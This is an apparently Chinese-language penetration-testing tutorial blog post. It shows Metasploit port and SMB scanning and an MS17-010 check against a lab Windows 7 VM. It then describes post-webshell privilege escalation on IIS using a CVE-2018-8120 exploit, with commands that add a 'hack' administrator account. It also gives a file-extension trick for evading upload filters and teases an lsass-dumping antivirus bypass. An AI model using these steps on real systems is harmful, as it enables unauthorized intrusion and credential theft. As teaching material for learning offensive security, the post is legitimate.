前言
meatasploit有很多模块,一共分为七类。
今天这篇文章介绍auxiliary、exploit 两个模块
端口扫描
对应的扫描模块
TCP端⼝扫描
auxiliary/scanner/portscan/tcp
扫描结束!192.168.119.139
开放了以下端口:
ACK防⽕墙扫描
auxiliary/scanner/portscan/ack
用ACK扫描会分段去发送数据包扫描,才能够绕过一些防火墙设备,而不是Windows防火墙!Windows自带的防火墙是阻断一切进入的连接!
因为虚拟机Windwos7是把防火墙关闭了的,如果打开那么防火墙是会阻断连接的!
经过测试,Windows防火墙开启,使用ACK是扫描不出来的!
探测对方操作系统信息:useauxiliary/scanner/smb/smb_version
可以看到,操作系统是Windows7,主机名是:LIUWX-PC,不在域内!
其他介绍
永恒之蓝:MS-17-010
Hostis likely VULNERABLE to MS17-010!
说明是存在永恒之蓝这个漏洞的!
存在的话,就可以利用这个模块
可以看到,虚拟机Win7已经蓝屏:
小技巧
我首先是在/root
目录下建立了一个ips.txt
文本,里面是我要扫描的IP:
一般正常的设置RHOSTS就是:
setrhosts 192.168.119.139
因为我们刚刚创建了个ips.txt,那么就可以这样设置:
setrhosts file:/root/ips.txt
这样的话就会非常方便!
具体就auxiliary
到此为止!
前言
这边是模拟拿到了一个WebShell的后渗透提权操作
提权过程
首先是看了看一个当前用户权限
iis apppoolbjgs_v2.1
是一个IIS的普通权限
创建用户:拒绝访问,那么权限还是比较低的!
先是上传个大马看看有没有可读可写的目录:
得到一个目录/文件夹:C:inetpubwwwrootbjgs_v2.1 可读,可写。
先看看当前主机的信息:systeminfo
关键信息有: 操作系统是Windows 7 x64 补丁只打了两个:KB2534111、KB976902
那么我们就可以上传*.exe本地溢出提权!
这边是在Github上找到了一个提权exe : https://github.com/alpha1ab/CVE-2018-8120
CVE-2018-8120 Windows LPE exploit测试支持: Win7 x32, Win7 x64, Win2008 x32, Win2008 R2 x32, Win2008 R2 Datacenter x64, Win2008 Enterprise x64 WinXP x32, Win2003 x32,Win2003 x64原exp不支持xp,2003,当前代码在原基础上增加了对这两个系统的支持
把exe上传到可读可写的目录:
先是使用exe看了看当前权限:
是一个:nt authoritysystem
系统权限!
提权命令:(创建一个hack用户并且提升为管理员组)
CVE-2018-8120.exe "net user hack hack /add"CVE-2018-8120.exe "net localgroup administrators hack /add"
提权成功!
番外篇
二进制文件后缀可任意修改
首先我们是有一个二进制文件:CVE-2018-8120.exe
接着把exe后缀改成txt
CVE-2018-8120.txt “whoami”
可以看到,是可以执行的!一般这种用于不能上传exe、bat文件,我们就可以把exe文件修改为可上传的后缀文件也能照常运行!
图片格式也是可以的!
今天在twitter上发现一个dump lsass新思路。bypass av哦。 createdump.exe是.NET5 自带的工具。 .NET5 安装程序下载地址:.NET5 下载连接 安装后文件路径 language C:Program Filesd…
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论